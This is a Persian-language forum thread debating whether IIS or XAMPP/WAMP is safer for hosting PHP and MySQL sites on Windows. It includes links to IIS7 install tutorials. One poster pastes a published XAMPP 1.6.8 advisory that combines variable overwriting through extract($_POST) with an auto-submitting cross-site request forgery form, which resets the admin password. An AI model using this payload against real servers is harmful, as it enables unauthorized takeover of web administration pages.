-
[QUOTE=patris1;258097][LEFT][URL]http://forum.persiannetworks.com/f78/t33000.html[/URL]
[URL="http://www.trainsignaltraining.com/install-mysql-on-iis7/2008-09-10/"]Install MySQL on IIS7 Server 2008 | Train Signal Training - Free Computer Training Videos[/URL]
[URL="http://www.trainsignaltraining.com/installing-wordpress-on-iis7/2008-10-06/"]Installing WordPress on IIS 7 – Part 1 | Train Signal Training - Free Computer Training Videos[/URL]
[URL="http://www.trainsignaltraining.com/installing-wordpress-on-iis7-2/2008-10-09/"]Installing WordPress on IIS7 – Part 2 | Train Signal Training - Free Computer Training Videos[/URL]
[URL="http://www.trainsignaltraining.com/install-phpmyadmin-on-iis7-and-server-2008/2008-09-16/"]Install PHPMyAdmin on IIS7 Server 2008 | Train Signal Training - Free Computer Training Videos[/URL]
[url=http://www.trainsignaltraining.com/iis-7-install-fastcgi-php/2008-09-04]IIS 7: Install FastCGI & PHP on Server 2008 | Train Signal Training - Free Computer Training Videos[/url]
[url=http://www.trainsignaltraining.com/iis7-url-rewrite-extension-on-windows-server-2008/2008-09-25]IIS7: URL Rewrite Extension on Windows Server 2008 | Train Signal Training - Free Computer Training Videos[/url]
[url=http://www.trainsignaltraining.com/windows-server-2008-http-redirection/2008-03-27]HTTP Redirection in IIS 7 on Windows Server 2008 | Train Signal Training - Free Computer Training Videos[/url]
[/LEFT][/QUOTE]
با IIS 6 هم جواب ميده؟
-
[QUOTE=Gitex;258480]درسته كه بصورت پكيج هستند ... اما ريزه كاري هايي هست كه وقتي به صورت مجزا (مثل MySql ) نصب ميشه تفاوت زيادي با پكيج داره.
در بسياري از موارد مشكلات پرميشن باعث ميشه سايت شما در 4 كليك ساده هك بشه.
تعدادي از فولدر ها هستند كه بايد تغييراتي در آنها داده بشه.
پس شما چطور امنيت IIS رو با xampp يا wamp يا easyphp و ... مقايسه ميكنيد ؟
اما بنده عرض كردم بهترين گزينه بين اين 3 تا wamp هست.[/QUOTE]
منظورتون از ریزه کاری فکر کنم تنظیمات باشه.
در مورد مشکلات پرمیشن شما با تغییرات در فایل httpd.conf در Apache میتوانید به هدف خود برسید.
در مورد مقایسه امنیت بهتر بود IIS را با Apache مقایسه میکردید تا با Xamp , Wamp و .....
که در بسیاری از موارد امن تر بودن Apache باعث محبوبیت آن شد.
-
ميتونم بپرسم httpd.conf چه ارتباطي به پرميشن و بستن دسترسي داره ؟ !!!
ببخشيد ... شايد سواد من نميرسه ولي بنده براي deny كردن از htaccess استفاده ميكنم و هيچ ارتباطي با httpd.conf در اين مورد پيدا نميكنم.
بهتر بود شما بحث رو از اول پيگيري كنيد تا بهتر متوجه سوال و جوابها بشيد.
دوستمون در محيط ويندوز ميخواد كار كنه ... خوب ... شما چطوري ميخوايد براي ايشون يه وب سرور امن ايجاد كنيد ؟ ايشون ميخواد آنلاين باشه ... امن تر از IIS در ويندوز كه Mysql و php و احيانا براي سهولت phpmyadmin هم داشته باشه شما سراغ داريد (براي استفاده آنلاين) ؟
نمونه اي از مشكلات xampp كه البته خيلي مبتدي هست.
البته اگر مايل بوديد ميتونيد لينك آپ بديد ... داون تحويل بگيريد.
[CODE]
XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke
Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php
There are two vulnerabilities that are being used toagther.
1)Global variable manipulation to spoof ip address.
2)XSRF to change the .htaccess password for http://10.1.1.10/security/
and http://10.1.1.10/xampp/ .
The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable, including the $_SERVER superglobal. This can be used to
"spoof" your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser in any ip address, so
long as that browser is currently authenticated.
This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
error_reporting(0);
extract($_POST);
extract($_SERVER);
$host = "127.0.0.1";
$timeout = "1";
if ($REMOTE_ADDR) {
if ($REMOTE_ADDR != $host) {
echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
exit;
}
}
//...
//Start of xsrf attack
<html>
<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
<input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
<input type=hidden name="xamppuser" value=admin >
<input type=hidden name="xampppasswd" value=password>
<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>//End of xsrf attack
[/CODE]
-
[QUOTE=essivision;258707]با IIS 6 هم جواب ميده؟[/QUOTE]
البته دوست عزيز. مشكلي در اين مورد نيست.